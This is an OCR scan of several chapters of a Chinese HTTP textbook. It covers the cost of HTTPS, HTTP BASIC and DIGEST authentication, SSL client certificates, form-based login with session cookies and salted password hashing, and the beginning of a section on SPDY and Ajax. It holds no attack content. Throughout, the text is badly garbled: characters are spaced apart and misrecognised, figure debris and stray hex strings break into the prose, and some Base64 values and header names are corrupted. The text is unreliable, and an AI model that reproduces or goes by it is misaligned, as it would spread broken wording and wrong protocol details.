IETF 以 SSL3.0 为 基准 ， 后 又 制定 了 ITLS1.0、TLS1.1 和 TLS1.2。 
TSL 是 以 SSL 为 原型 开发 的 协议 ， 有 时 会 统一 称 该 协议 为 SSL。 当 前 
主流 的 版 本 是 SSL3.0 和 TLS1.0。 

由 于 SSL1.0 协议 在 设计 之 初 被 发 现 出 了 问题 ， 就 没有 实际 投入 
使 用 。SSL2.0 也 被 发 现存 在 问题 ， 所 以 很 多 浏览 硕 百 接 废 除了 该 协 





议 版 本 。 
国 SSL 吉 度 慢 吗 

HTTPS 也 存在 一 些 问 题 ， 那 就 是 当 使 用 SSL 时 ， 它 的 处 理 速 度 会 
变 慢 





解密 处 理 ， 因 此 会 消耗 CPU 和 内 存 等 硬件 资源 


SSL 


HTTP 请 求 


医 HTTPS 还 需要 做 服务 器 、 客 户 端 双方 加 密 及 




















HTTP 响应 






和 HTTP 通 信 相 比 ,SSL 通 信 部 分 消耗 网 络 资源 。 
而 SSL 通 信 部 分 ,又 因为 要 对 通信 进行 处 理 ， 所 
以 时 间 上 又 延长 了 








图 : HTTPS 比 HTTP 要 慢 2 到 100 借 





SSL 的 慢 分 两 种 。 一 种 是 指 通信 慢 。 另 一 种 是 指 由 于 大 量 消 耗 CPU 
及 内 存 等 资源 ， 导 致 处 理 速度 变 慢 。 

和 使 用 HTTP 相 比 ， 网 络 负 载 可 能 会 变 慢 2 到 100 倍 。 除 去 和 TCP 
连接 、 发 送 HTTP 请 求 。 响 应 以 外 ， 还 必须 进行 SSL 通信 ， 因 此 整体 上 
处 理 通信 量 不 可 避免 会 增加 。 
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另 一 点 是 SSL 必须 进行 加 密 处 理 。 在 服务 器 和 客户 端 都 需要 进行 
加 密 和 人 解密 的 运算 处 理 。 因 此 从 结果 上 讲 ， 比 起 HITP 会 更 多 地 消耗 服 
务 角 和 客户 端的 便 件 资源 ， 导 致 负载 增强 。 

针对 速度 变 慢 这 一 问题 ， 并 没有 根本 性 的 解决 方案 ， 我 们 会 使 用 
SSL 加 速 希 这 种 〈 专 用 服务 器 ) 便 件 来 改善 该 问题 。 该 人 硬件 为 SSL 通信 
专用 硬件， 相对 软件 来 讲 ， 能 够 提高 数 倍 SSL 的 计算 速度 。 仅 在 SSL 
处 理 时 发 挥 SSL 加 速 器 的 功效 ， 以 分 担负 和 载 。 











为 什么 不 一 县 使 用 HTTPS 


既然 HTTPS 那么 安全 可 靠 ， 那 为 何 所 有 的 Web 网 站 不 一 直 使 用 
HTTPS ? 

其 中 一 个 原因 是 ， 因 为 与 纯 文本 通信 相 比 ， 加 密 通信 会 消耗 更 多 的 
CPU 及 内 存 资源 。 如 果 每 次 通信 都 加 密 ， 会 消耗 相当 多 的 资源 ， 平 挫 到 一 
台 计算 机 上 时 ， 能 够 处 理 的 请 求 数量 必定 也 会 随 之 减少 。 

因此 ， 如 果 是 非 敏 感 信 息 则 使 用 HTTP 通信 ， 只 有 在 包含 个 人 信息 等 敏 
感 数 据 时 ， 才 利用 HTTPS 加 密 通信 。 

特别 是 每 当 那 些 访问 量 较 多 的 Web 网 站 在 进行 加 密 处 理 时 ， 它 们 所 承 
担 着 的 负载 不 容 小 凯 。 在 进行 加 密 处 理 时 ， 并 非 对 所 有 内 容 都 进行 加 密 处 理 ， 
而 是 仅 在 那些 需要 信息 隐藏 时 才 会 加 密 ， 以 节约 资源 。 







1f797cO04ed91297d9dd 
9d71b09b66a 1f.… 





服务 器 


除 此 之 外 ， 想 要 市 约 购 买 证 书 的 开销 也 是 原因 之 一 。 
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要 进行 HTTPS 通信 ， 证 书 是 必 不 可 少 的 。 而 使 用 的 证 书 必须 向 认证 机 
构 ( CA) 购买 。 证 书 价格 可 能 会 根据 不 同 的 认证 机 构 略 有 不 同 。 通 常 ， 一 
年 的 授权 需要 数 万 日 元 ( 现在 一 万 日 元 大 约 折合 600 人 民 币 
那些 购买 证 书 并 不 合算 的 服务 以 及 一 些 个 人 网 站 ， 可 能 只 会 选择 采用 
I I 7 
图 图 辆 
加 加 
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第 8 章 
确认 访问 用 户 身 份 的 认证 
东 些 Web 页 面 只 想 让 特定 的 人 浏览 ， 或 者 干脆 仅 本 人 可 见 。 为 达 


到 这 个 目标 , 必 不 可 少 的 就 是 认证 功能 。 下 面 我 们 一 起 来 学 习 一 下 
认证 机 制 。 
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8.1 何 为 认证 


计算 机 本 吴 无 法 判断 坐 在 显示 融 前 的 使 用 者 的 身份 。 进 一 步 说 ， 也 
无 法 确认 网 络 的 那 头 究竟 有 谁 。 可 见 ， 为 了 弄 清 究竟 是 谁 在 访问 服务 
希 ， 就 得 让 对 方 的 客户 端 目 报 家 门 。 

可 是 ,就算 正在 访问 服务 右 的 对 方 声称 自己 是 ueno， 刁 份 是 否 属实 
这 点 却 也 无 从 谈 起 。 为 确认 ueno 本 人 是 否 丰 的 具有 访问 系统 的 权限 ， 
就 需要 核对 “登录 者 本 人 才 知 道 的 信息 ”、“ 登 录 者 本 人 才 会 有 的 信息 ”。 

核对 的 信息 通常 是 指 以 下 这 些 。 





























e@ 密码 : 只 有 本 人 才 会 知道 的 字符 串 信息 。 
e@ 动态 令 牌 : 仅 限 本 人 持 有 的 设备 内 显示 的 一 次 性 密码 。 
e@ 数字 证 书 : 仅 限 本 人 ( 终端 ) 持 有 的 信息 。 
168 e@ 生物 认证 : 指纹 和 虹膜 等 本 人 的 生理 信息 。 
e IC 卡 等 : 仅 限 本 人 持 有 的 信息 。 












我 是 上 野 。 我 曲 窗 码 是 
XxxxXX。 你 瞧 ， 我 几 
道 定 码 ， 可 以 确认 我 是 
本 人 了 3 吧 ? 














但 是 ， 即 便 对 方 是 假冒 的 用 户 ， 只 要 能 通过 用 户 验证 ， 那 么 计算 机 
束 会 默认 是 出 日 本 人 的 行为 。 因 此 ， 千 控 机 密 信 息 的 密码 绝 不 能 让 他 人 
得 到 ， 更 不 能 轻易 地 就 被 破解 出 来 。 
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HTTP 使 用 的 认证 方式 
HTTP/1.1 使 用 的 认证 方式 如 下 所 示 。 


e BASIC 认证 ( 基本 认证 ) 

e DIGEST 认证 ( 摘要 认证 ) 

@ SSL 客户 端 认证 

e FormBase 认证 ( 基于 表单 认证 ) 

此 外 ， 还 有 Windows 统一 认证 〈Keberos 认证 、NTLM 认证 )， 但 
本 书 不 作 讲解 。 


8.2 BASIC 认证 


BASIC 认证 (基本 认证 ) 是 从 HTTP/1.0 就 定义 的 认证 方式 。 即 便 
是 现在 仍 有 一 部 分 的 网 站 会 使 用 这 种 认证 方式 。 是 Web 服务 磊 与 通信 
客户 端 之 间 进 行 的 认证 方式 。 


BASIC 认证 的 认证 步 又 








发 送 请 求 
| GET /private/ HTTP/1.1 
Host: hackr.jp 
客户 端 ] 反 \ pA \1 生 1 XL EE 齐 行 、 六 
人 由 返回 状态 码 401 以 告知 客户 端 需要 进行 认证 





HTTP/1.1 401 Authorization Reduired 
Date: Mon, 19 Sep 2011 08:38:32 GMT 





Server: Apache/2.2.3 (Unix) 
WWW-Authenticate: Basic realm="Input Your ID and Password." 


(用 户 ID 和 密码 以 Base64 方 式 编码 后 发 送 
guest:guest 一 Base64 一 Z3VIc3Q6Z3VIc3Q= 











GET /private/ HTTP/1.1 


Host: hackr.jp 
Authorization: Basic Z3VIc3Q6Z3VIc3Q= 


(3) 认 证 成 功 者 返回 状态 码 200， 若 认证 失败 则 返回 状态 码 401 
HTITP/1.1 200 OK 











Date: Mon, 19 Sep 2011 08:38:35 GMT 
Server: Apache/2.2.3 (Unix) 





: BASIC 认证 概要 
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步骤 1: ” 当 请 求 的 资源 需要 BASIC 认证 时 ， 服 务 器 会 随 状 态 码 401 
Authorization Required， 返 回 市 WWW-Authenticate 首部 
字段 的 啊 应 。 该 字段 内 包含 认证 的 方式 (BASIC) 及 
Request-URI 安全 域 字 符 串 (realm )。 

步骤 2: ”接收 到 状态 人 码 401 的 客户 闹 为 通过 BASIC 认证 ， 需 要 
将 用 户 ID 及 密码 发 送 给 服务 右 。 发 送 的 字符 串 内 容 是 由 
用 户 ID 和 密码 构成 ， 两 者 中 间 以 冒号 (:) 连接 后 ， 骨 经 
过 Base64 编码 处 理 。 
假设 用 户 ID 为 guest， 密 人 码 是 guest， 连 接 起 来 就 会 形成 
guest:guest 这 样 的 字符 串 。 然 后 经 过 Base64 编码 ， 最 后 的 
结 末 即 是 Z3Vlc3Q6Z3Vlc3Q=。 把 这 器 字符 串 与 人 首部 字 
段 Authorization 后 ， 发 送 请求 。 
当 用 户 代 理 为 浏览 硕 时 ， 用 户 仅 需 输入 用 户 ID 和 密码 
即 可 ， 之 后 ， 浏 览 硕 会 目 动 完成 到 Base64 编码 的 转换 
工作 。 




















请 输入 用 户 名 和 密码 





1? http://hackrjp 请 求 用 户 名 和 密码 。 








步骤 3: ”接收 到 包含 首部 字段 Authorization 请 求 的 服务 器 ， 会 对 认 
证 信息 的 正确 性 进行 验证 。 如 验证 通过 ， 则 返回 一 条 包含 
Request-URI 资源 的 啊 应 。 


BASIC 认证 虽然 采用 Base64 编码 方式 ， 但 这 不 是 加 密 处 理 。 不 需 
要 任何 附加 信息 即 可 对 其 解码 。 换 言 之 ， 由 于 明文 解码 后 就 是 用 户 ID 
和 密码 ， 在 HTTP 等 非 加 密 通 信 的 线路 上 进行 BASIC 认证 的 过 程 中 ， 
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如 果 被 人 急 听 ， 人 被 盗 的 可 能 性 极 蜗 。 

另外 ， 除 此 之 外 想 再 进行 一 次 BASIC 认证 时 ,一 般 的 浏览 器 却 无 
法 实现 认证 注销 操作 ， 这 也 是 问题 之 一 。 

BASIC 认证 使 用 上 不 够 便捷 灵活 ， 且 达 不 到 多 数 Web 网 站 期 望 的 
安全 性 等 级 ， 因 此 它 并 不 当 用 。 














8.3 DIGEST 认证 


为 弥补 BASIC 认证 存在 的 弱点 ， 从 HTTP/1.1 起 就 有 了 DIGEST 认 
证 。 DIGEST 认证 同样 使 用 质询 / 啊 应 的 方式 〈challenge/response )， 但 
不 会 像 BASIC 认证 那样 直接 发 送 明文 密码 。 
所 请 质询 响应 方式 是 指 ， 一 开始 一 方 会 完 发 送 认 证 要 求 给 男 一 方 ， 
接着 使 用 从 另 一 方 那 接收 到 的 质询 码 计算 生成 啊 应 码 。 最 后 将 啊 应 码 返 
回 给 对 方 进行 认证 的 方式 。 171 























认证 要 求 
一 > 
客户 端 
质询 码 A 
ys 
从 质询 计算 ~ 
响应 响应 码 
一 > 


因为 发 送 给 对 方 的 只 是 啊 应 摘要 及 由 质询 码 产 生 的 计算 结果 ， 所 以 
比 起 BASIC 认证 ， 密 码 泄露 的 可 能 性 就 降低 了 。 
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DIGEST 认证 的 认证 步骤 


发 送 请 求 


ee” GET /digest/ HTTP/1.1 
Host: hackr.jp 


客户 端 (发送 临时 的 质询 码 ( 随机 数 ，nonce ) 以 及 告知 需要 认证 的 
状态 码 401 


HTTP/1.1 401 Authorization Required 
WWW-Authenticate: Digest realm="DIGEST", 
nonce=" MOSQZOitBAA=44abb6784cc9cbfc605a5b0893d36f23de 服务 吾 衣 
95fcff", algorithm=MD5, qop="auth" 


(发送 摘要 以 及 由 质询 码 计算 出 的 响应 码 ( response ) 


GET /digest/ HTTP/1.1 

Host: hackr.jp 

Authorization: Digest username="guest", realm="DIGEST", 
nonce="MOSQZOitBAA=44abb6784cc9cbfc605a5b0893d36f23de95f 
cff", uri="/digest/", algorithm=MD5， 
response="df56389ba3f7c52e9d7551115d67472f", qop=auth, 
nc=00000001, cnonce="082c875dcb2ca740" 


























(3) 认 证 成 功 返 回 状态 码 200， 失败 则 再 次 发 送 状 态 码 401 


HTTP/1.1 200 OK 





172 Authentication-lnfo: 
rspauth="f218e9ddb407a3d16f2f7d2c4097e900", 
cnonce="082c875dcb2ca740", nc=00000001, qop=auth 





: DIGEST 认证 概要 





步骤 1: ”请 求 需 认证 的 资源 时 ， 服 务 侣 会 随 看 状态 人 码 401 Authorization 
Required， 返 回 市 WWW-Authenticate 首部 字段 的 啊 应 。 
该 字段 内 包含 质问 啊 应 方式 认证 所 需 的 临时 质询 码 〈 随 机 
数 ，nonce )。 
i 字段 WWW-Authenticate 内 必须 包含 realm nonce 

字段 的 信息 。 客 户 并 就 是 依 徘 加 服务 冀 回 送 这 两 个 

a 
nonce 是 一 种 每 次 随 返 回 的 401 啊 应 生成 的 任意 随机 字符 
串 。 该 字符 串通 常 推 荐 由 Base64 编码 的 十 六 进 制 数 的 组 
成 形式 ,但 实际 内 容 依 赖 服务 剖 的 具体 实现 。 

步骤 2: 接收 到 401 状态 人 码 的 客户 端 ， 返 回 的 啊 应 中 包含 DIGEST 
认证 必须 的 首部 字段 Authorization 信息 。 
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首部 字段 Authorization 内 必须 包含 username、realm.、 





nonce、uri 和 response 的 字段 信息 。 其 中 ，realm 和 nonce 
束 是 之 前 从 服务 副 接 收 到 的 啊 应 中 的 字段 。 
username 是 realm 限定 范围 内 可 进行 认证 的 用 户 名 。 
uUri (digest-uri ) 即 Request-URI 的 值 ， 但 考虑 到 经 代理 转 
发 后 Request-URI 的 值 可 能 被 修改 ， 因 此 事先 会 复制 一 份 
副本 保存 在 uri 内 。 
response 也 可 叫做 Request-Digest， 存 放 经 过 MD5 运算 后 
的 密码 学 符 串 ， 形 成 响应 人 码 。 
啊 应 中 其 他 的 实体 请 参见 第 6 和 草 的 请 求 首 部 字段 
Authorization。 另 外 ， 有 关 Request-Digest 的 计算 规则 较 复 
杂 ， 有 兴趣 的 读者 不 妨 深 入 学 习 一 下 RFC2617。 

步骤 3: ”接收 到 包含 首部 字段 Authorization 请 求 的 服务 入， 会 确认 
认证 信息 的 正确 性 。 认 证 通过 后 则 返回 包含 Request-URI 
资源 的 啊 应 。 
并 且 这 时 会 在 首部 字段 Authentication-Info 写 入 一些 认证 
成 功 的 相关 信息 。 
DIGEST 认证 提供 了 高 于 BASIC 认证 的 安全 等 级 ,但 是 和 
HTTPS 的 客户 端 认 证 相 比 仍旧 很 弱 。DIGEST 认证 提供 防 
止 密 码 被 锚 听 的 保护 机 制 ， 但 并 不 存在 防止 用 户 伪 北 的 保 
护 机 制 。 
DIGEST 认证 和 BASIC 认证 一 样 , 使 用 上 不 那么 便捷 灵 
活 ， 且 仍 达 不 到 多 数 Web 网 站 对 高 度 安 全 等 级 的 追求 标 
准 。 因 此 它 的 适用 旋 围 也 有 所 受 限 。 














We3 














8.4 SSL 凌 户 端 认证 
从 使 用 用 户 ID 和 密码 的 认证 方式 方面 来 讲 ， 只 要 二 者 的 内 容 正确 ， 
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即 可 认证 是 本 人 的 行为 。 但 如 果 用 户 ID 和 密码 被 盗 ， 就 很 有 可 能 被 第 
三 者 冒充 。 利 用 SSL 客户 端 认 证 则 可 以 避免 该 情况 的 发 生 。 

SSL 客户 端 认 证 是 借 由 HTTPS 的 客户 端 证 书 完 成 认证 的 方式 。 和 赁 
音 客户 端 证 书 (在 HTTPS 一 章 已 讲解 ) 认证 ， 服 务 需 可 确认 访问 是 否 
来 自已 登录 的 客户 端 。 





8.4.1 SSL 客户 端 认 证 的 认证 步 又 
为 达到 SSL 客户 端 认 证 的 目的 ， 需 要 事先 将 客户 端 证 书 分 发 给 客户 
端 ， 且 客户 端 必须 安装 此 证 书 。 
步骤 1: 接收 到 需要 认证 资源 的 请 求 ， 服 务 需 会 发 送 Certificate 
Request 报 文 ， 要 求 客户 端 提 供 客 户 端 证 书 。 
步骤 2: 用户 选择 将 发 送 的 客户 问 证 书后 ， 客 户 端 会 把 客户 端 证 书 
言 息 以 Client Certificate 报 文 方式 发 送 给 服务 器 。 














常规 ”| 详细 信息 | 证 书 路 径 | 








出 | 证 书信 息 


这 个 证 书 的 目的 如 下 : 
。 保 证 远程 计算 机 的 身份 
。 向 远程 计算 机 证 明 您 的 身份 
。2,16,.840,1,113733,1.7,23,6 
。2,16,.840,1.113730.4,.1 


* 有 关 详 细 信 息 ， 请 参考 证 书 颁 发 机 构 的 说 明 。 


颁发 给 : entryll,bk,mufg,jp 


颁发 者 : VeriSign Class 3 Extended Validation SSL 
SGC CA 


有 效 期 从 ”星期 二 06- 04 到 星期 六 08- ( 


颁发 者 说 明 (5S) 


了 和 解 证 书 的 详细 信息 














图 : 选择 客户 端 证 书 示 例 ( 三 鞭 东 京 UFJ 银行 ) 








步骤 3: ”服务 胡 验 证 客户 问 证 书 验 证 通过 后 方 可 领取 证 书 内 客户 端 
的 公开 密 铀 ， 然 后 开始 HTTPS 加 密 通 信 。 
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8.4.2 SSL 客户 端 认 证 采用 双 因 素 认证 

在 多 数 情 况 下 ，SSL 客户 端 认 证 不 会 仅 依靠 证 书 完成 认证 ， 一 般 会 
和 基于 表单 认证 〈 稍 后 讲解 ) 组 合 形成 一 种 双 因 素 认 证 〈Two-factor 
authentication ) 来 使 用 。 所 谓 双 因 和 际 认证 束 是 指 ， 认 证 过 程 中 不 仅 需 要 
密码 这 一 个 因 系 ， 还 和 需要 申请 认证 者 提供 其 他 持 有 信息 ， 从 而 作为 男 一 
个 因 系 ， 与 其 组 合 使 用 的 认证 方式 。 

换言之 ， 第 一 个 认证 因素 的 SSL 客户 端 证 书 用 来 认证 客户 端 计算 
机 ， 另 一 个 认证 因素 的 密码 则 用 来 确定 这 是 用 户 本 人 的 行为 。 

通过 双 因 系 认 证 后 ， 就 可 以 确认 是 用 户 本 人 正在 使 用 匹配 正确 的 计 
算 机 访问 服务 硕 。 


8.4.3 SSL 客户 端 认 证 必要 的 费用 

使 用 SSL 客户 端 认 证 需要 用 到 客户 站 证 书 。 而 客户 中 证 书 需要 文 
付 一 定 费 用 才能 使 用 。 

这 里 提 到 的 费用 是 指 ， 从 认证 机 构 购 买 客户 问 证 书 的 费用 ， 以 及 服 
务 人 运营 者 为 保证 日 己 搭建 的 认证 机 构 安 全 运营 所 产生 的 费用 。 

每 个 认证 机 构 颁 发 客户 中 证 书 的 费用 不 尽 相 同 ， 平 摊 到 一 张 证 书 
上 , 一 年 费用 约 几 万 至 十 几 万 日 元 。 服 务 如 运营 者 也 可 以 自己 搭建 认证 
机 构 ， 但 要 维持 安全 运行 就 会 产生 相应 的 费用 。 


















































8.5 ”基于 表单 认证 


基于 表单 的 认证 方法 并 不 是 在 HTTP 协议 中 定义 的 。 客 户 端 会 向 服 
务 需 上 的 Web 应 用 程序 发 送 登 录 信息 ( Credential )， 按 登录 信息 的 验证 
结 采 认证 。 

根据 Web 应 用 程序 的 实际 安装 ， 提 供 的 用 户 界 面 及 认证 方式 也 各 
不 相同 。 








Ws 
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(5 加 中 欢迎 使 用 Gmail 


Google 提供 的 电子 邮件 服务 。 


Gmail 的 开发 理念 是 ， 电 子 邮 件 可 以 更 加 直观 、 高 效 而 实用 ， 甚 至 可 有 
能 很 有 趣 。 毕 竟 ，Gmail 具有 以 下 特点 : Google 帐户 
减少 垃圾 邮件 用 户 名 :| 
利用 Google 的 创新 技术 可 以 将 垃圾 邮件 拒 于 收 件 箱 之 如 : 
外 。 


pat@example.com 


手机 邮箱 

将 手机 的 网 络 浏览 器 指向 http://gmail.com ， 便 可 以 
在 您 的 手机 上 查阅 Gmail。 了 人 解 详情 

超大 空间 

超过 7497.396475 MB ( 还 在 不 断 增 加 ) 的 免费 存储 空 
间 。 


初次 使 用 Gmail? 它 简单 易 用 
最 新 通知 : 隐私 权 政 策 已 进行 了 简化 和 更 新 。 了 解 更 多 信息 . 而 且 免 费 提供 。 


创建 帐户 > 


图 : 基于 表单 认证 示例 ( Google ) 











多 数 情 况 下 ， 输 入 已 事先 登录 的 用 户 ID ( 通 笛 是 任意 字符 串 或 邮件 
地 址 ) 和 密码 等 登录 信息 后 ， 发 送 给 Web 应 用 程序 ， 基 于 认证 结果 来 
决定 认证 是 否 成 功 。 


8.5.1 认证 多 半 为 基于 表单 认证 

由 于 使 用 上 的 便利 性 及 安全 性 问题 ，HTTP 协议 标准 提供 的 BASIC 
认证 和 DIGEST 认证 几乎 不 怎么 使 用 。 另 外 ，SSL 客户 问 认 证 虽然 具有 
高 度 的 安全 等 级 ， 但 因为 导入 及 维持 费用 等 问题 ， 还 尚未 普及 。 

比如 SSH 和 FTP 协议 ， 服 务 右 与 客户 并 之 则 的 认证 是 合乎 标准 规 
范 的 ， 并 且 满 足 了 最 基本 的 功能 需求 上 的 安全 使 用 级 别 ， 因 此 这 些 协 议 
的 认证 可 以 拿 来 直接 使 用 。 但 是 对 于 Web 网 站 的 认证 功能 ， 能 够 满足 
其 安全 使 用 级 别 的 标准 规范 并 不 存在 ， 所 以 只 好 使 用 由 Web 应 用 程序 
各 上 自 实现 基于 表单 的 认证 方式 。 

不 具备 共同 标准 规范 的 表单 认证 ， 在 每 个 Web 网 站 上 都 会 有 各 不 
相同 的 实现 方式 。 如 果 是 全 面 考 虑 过 安全 性 能 而 实现 的 表单 认证 ， 那 么 
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怠 能 够 具备 高 度 的 安全 等 级 。 但 在 表单 认证 的 实现 中 存在 问题 的 Web 
网 站 也 是 屠 见 不 侠 。 


8.5.2 ”Session 管理 及 Cookie 应 用 

基于 表单 认证 的 标准 规范 尚未 有 定论 ， 一 般 会 使 用 Cookie 来 管理 
Session ( 会 话 )。 

基于 表单 认证 本 身 是 通过 服务 器 端的 web 应 用 ， 将 客户 端 发 送 过 
来 的 用 户 ID 和 密码 与 之 前 登录 过 的 信息 做 匹配 来 进行 认证 的 。 

但 鉴于 HTTP 是 无 状态 协议 ， 之 前 已 认证 成 功 的 用 户 状 态 无 法 通过 
协议 层面 保存 下 来 。 即 ， 无 法 实现 状态 管理 ， 因 此 即使 当 该 用 户 下 一 次 
继续 访问 ， 也 无 法 区 分 他 与 其 他 的 用 户 。 于 是 我 们 会 使 用 Cookie 来 管 
理 Session， 以 弥补 HTTP 协议 中 不 存在 的 状态 管理 功能 。 


和 纺 


客户 站 服务 器 
中 发 送 已 登录 信息 ( 用 户 ID， 密 码 ) 




















回 用 户 发 放 Session 

SS x A 

(CO) 发 送 包 含 Session ID 的 Cookie | 记录 认证 居 人 六 
Set-Cookie: PHPSESSID=028a8c...; 








(3) 发 送 包 含 Session ID 的 Cookie 通 过 验证 Session 
Cookie: PHPSESSID=028a8c... ID 器 定 对 方 是 








: Session 管理 及 Cookie 状态 管理 


步骤 1: ”客户 端 把 用 户 ID 和 密码 等 登录 信息 放 人 报 文 的 实体 部 分 ， 
通常 是 以 POST 方法 把 请 求 发 送 给 服务 右 。 而 这 时 ， 会 使 
用 HTTPS 通信 来 进行 HTML 表单 画面 的 显示 和 用 户 输入 
数据 的 发 送 。 

步骤 2: 服务 磊 会 发 放 用 以 识别 用 户 的 Session ID。 通 过 验证 从 客 














WA 
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户 端 发 送 过 来 的 登录 信息 进行 身份 认证 ， 然 后 把 用 户 的 认 
证 状态 与 Session ID 绑 定 后 记录 在 服务 大 端 。 
问 客 户 问 返回 啊 应 时 ， 会 在 首部 字段 Set-Cookie 内 写 人 
Session ID ( 如 PHPSESSID=028a8c… )。 
你 可 以 把 Session ID 想象 成 一 种 用 以 区 分 不 同 用 户 的 等 位 号 。 
然而 ， 如 果 Session ID 被 第 三 方 资 走 ， 对 方 束 可 以 伪 准 成 你 的 
身份 进行 恶意 操作 了 。 因 此 必须 防止 Session ID 被 盗 ， 或 被 
青 出 。 为 了 做 到 这 点 ，Session ID 应 使 用 难以 推测 的 字符 串 ， 
日 服务 右 病 也 需要 进行 有 效 期 的 管理 ,保证 其 安全 性 。 
男 外 ， 为 减轻 跨 站 脚本 攻击 (XSS ) 造成 的 损失 ， 建 议事 
完 在 Cookie 内 加 上 httponly 属性 。 

步骤 3: 客户 端 接收 到 从 服务 硕 端 发 来 的 Session ID 后 ,会 将 其 作 
为 Cookie 保存 在 本 地 。 下 次 回 服 务 胡 发 送 请 求 时 ， 浏 览 硒 
会 目 动 发 送 Cookie， 所 以 Session ID 也 随 之 发 送 到 服务 需 。 
服务 硕 端 可 通过 验证 接收 到 的 Session ID 识别 用 户 和 其 认 
证 状态 。 


除了 以 上 介绍 的 应 用 实例 ， 还 有 应 用 其 他 不 同方 法 的 案例 。 

为 外 ,不 仅 基 于 表单 认证 的 登录 信息 及 认证 过 程 都 无 标准 化 的 方 
服务 带 痪 应 如 何 保存 用 户 提 交 的 密码 等 登录 信息 等 也 没有 标准 化 。 
通常 ， 一 种 安全 的 保存 方法 是 ， 先 利用 给 密码 加 盐 ( salt ) “的 方式 
增加 额外 信息 ， 再 使 用 散 列 〈hash ) 函数 计算 出 散 列 值 后 保存 。 但 是 我 
们 也 经 笛 看 到 直接 保存 明文 密码 的 做 法 ， 而 这 样 的 做 法 具有 导致 密码 泄 
露 的 风险 。 


























法 





3 








(DD ”salt 其实 就 是 由 服务 器 随机 生成 的 一 个 字符 事 ， 但 是 要 保证 长 度 足够 上 长， 并 
且 是 真正 随机 生成 的 。 然 后 把 它 和 密码 字符 串 相 连接 ( 前 后 都 可 以 ) 生成 散 
列 值 。 当 两 个 用 己 使 用 了 同一 个 客 码 时 ， 由 于 随机 生成 的 Salt 值 不 同 ， 对 应 
的 散 列 值 也 将 是 不 同 的 。 这 样 一 来 ， 很 大 程度 上 减少 了 密码 特征 ， 攻 击 者 也 
就 很 难 利用 自己 手中 的 密码 特征 库 进 行 破解 。 译 者 注 
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第 9 章 
基于 HTTP 的 功能 追加 协议 
虽然 HTTP 协 议 既 简单 又 简捷 , 但 随 着 时 代 的 发 展 ， 其 功能 使 用 上 


捉襟见肘 的 疲 态 已 经 凸显 。 本 章 我 们 将 讲解 基于 HTTP 新 增 的 功 
能 的 协议 。 
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9.1 基于 HTTP 的 协议 


在 建立 HITP 标准 规范 时 ， 制 订 者 主要 想 把 HITP 当 作 传输 HTML 
文档 的 协议 。 随 看 时 代 的 发 展 ，Web 的 用 途 更 具 多 样 性 ， 比 如 演化 成 在 
线 购 物 网 站 、SNS ( Social Networking Service， 社 交 网 络 服务 )、 企 业 或 
组 织 内 部 的 各 种 管理 工具 ， 等 等 。 

而 这 些 网 站 所 追求 的 功能 可 通过 Web 应 用 和 脚本 程序 实现 。 即 使 
这 些 功能 已 经 满足 需求 ， 在 性 能 上 却 未 必 最 优 ， 这 是 因为 HTTP 协议 上 
的 限制 以 及 目 身 性 能 有 限 。 

HTTP 功能 上 的 不 足 可 通过 创建 一 套 全 新 的 协议 来 弥补 。 可 是 目前 
基于 HTTP 的 Web 浏 贤 帮 的 使 用 环境 已 遍布 全 球 ， 因 此 无 法 完全 抛弃 
HTTP。 有 一 些 新 协议 的 规则 是 基于 HTTP 的 ， 并 在 此 基础 上 添加 了 新 
的 功能 。 




















9.2 ”消除 HTTP 瓶颈 的 SPDY 


Google 在 2010 年 发 布 了 SPDY ( 取 自 SPeeDY,， 发 首 同 Speedy )， 
其 开发 目标 旨 在 解决 HITP 的 性 能 瓶 锅 ， 缩 短 Web 页 面 的 加 载 时 间 
( 50% )。 
® SPDY - The Chromium Projects 
http:/www.chromium.org/spdy/ 


9.2.1 HTTP 的 瓶颈 

在 Facebook 和 Twitter 等 SNS 网 站 上 ， 几 乎 能 够 实时 观察 到 海量 
户 公 开发 布 的 内 容 ， 这 也 是 一 种 乐趣 。 当 几 百 、 儿 千 万 的 用 户 发 布 内 容 
时 ，Web 网 站 为 了 保存 这 些 新 增 内 容 ， 在 很 短 的 时 间 内 就 会 发 生 大 量 的 
内 容 更 新 。 

为 了 尽 可 能 实时 地 显示 这 些 更 新 的 内 容 ， 服 务 关 上 一 有 内 容 更 新 ， 
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就 需要 直接 把 那些 内 容 反 蚀 到 客户 端的 界面 上 。 虽 然 看 起 来 挺 简单 的 ， 
但 HTTP 却 无 法 妥善 地 处 理 好 这 项 任务 。 

使 用 HTTP 协议 探知 服务 右上 是 否 有 内 容 更 新 ， 就 必须 频繁 地 从 客 
户 站 到 服务 硕 端 进行 确认 。 如 条 服 务 硕 上 没有 内 容 更 新 ， 那么 就 会 产生 
徒劳 的 通信 。 

若 想 在 现 有 Web 实现 所 需 的 功能 ， 以 下 这 些 HTTP 标准 就 会 成 为 
瓶颈 。 




















一 条 连接 上 只 可 发 送 一 个 请 求 。 
e@ 请 求 只 能 从 客户 端 开始 。 客 户 端 不 可 以 接收 除 响 应 以 外 的 指令 。 
e@ 请 求 / 响应 首部 未 经 压缩 就 发 送 。 首 部 信息 越 多 延迟 越 大 。 
e@ 发 送 元 长 的 首部 。 每 次 互相 发 送 相同 的 首部 造成 的 溪 费 较 多 。 
e@ 可 任意 选择 数据 压缩 格式 。 非 强制 压缩 发 送 。 
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发 送 确认 请 来 
更 新 情况 = ny 


的 请 来 ee 响应 
















不 管 是 否 有 更 新 ， 
都 要 把 数据 全 部 
二 受过 等 次 














图 : 以 前 的 HTTP 通信 
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Ajax 的 解决 方法 

Ajax (Asynchronous JavaScript and XML ， 异 步 JavaScript 与 XML 
技术 ) 是 一 种 有 效 利 用 JavaScript 和 DOM ( Document Object Model， 文 
档 对 象 模型 ) 的 操作 ， 以 达到 局 部 Web 页 面 蔡 换 加 载 的 异步 通信 手段 。 
和 以 前 的 同步 通信 相 比 ， 由 于 它 只 更 新 一 部 分 页 面 ， 啊 应 中 传输 的 数据 
量 会 因此 而 减少 ， 这 一 优点 显 而 匈 见 。 

Ajax 的 核心 技术 是 名 为 XMLHttpRequest 的 API， 通 过 JavaScript 
脚本 语言 的 调用 就 能 和 服务 磊 进 行 HTTP 通信 。 借 由 这 种 手段 ， 就 能 从 
已 加 载 完 毕 的 Web 页 面 上 发 起 请 求 ， 只 更 新 局 部 页 面 。 

而 利用 Ajax 实时 地 从 服务 硕 获 取 内 容 ， 有 可 能 会 导致 大 量 请 求 产 
生 。 另 外 ，Ajax 仍 未 解决 HTTP 协议 本 号 存在 的 问题 。 
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< 页 面 的 局 部 更 
新 可 能 实现 > 












每 次 都 互相 发 送 相同 的 首部 有 时 不 压 
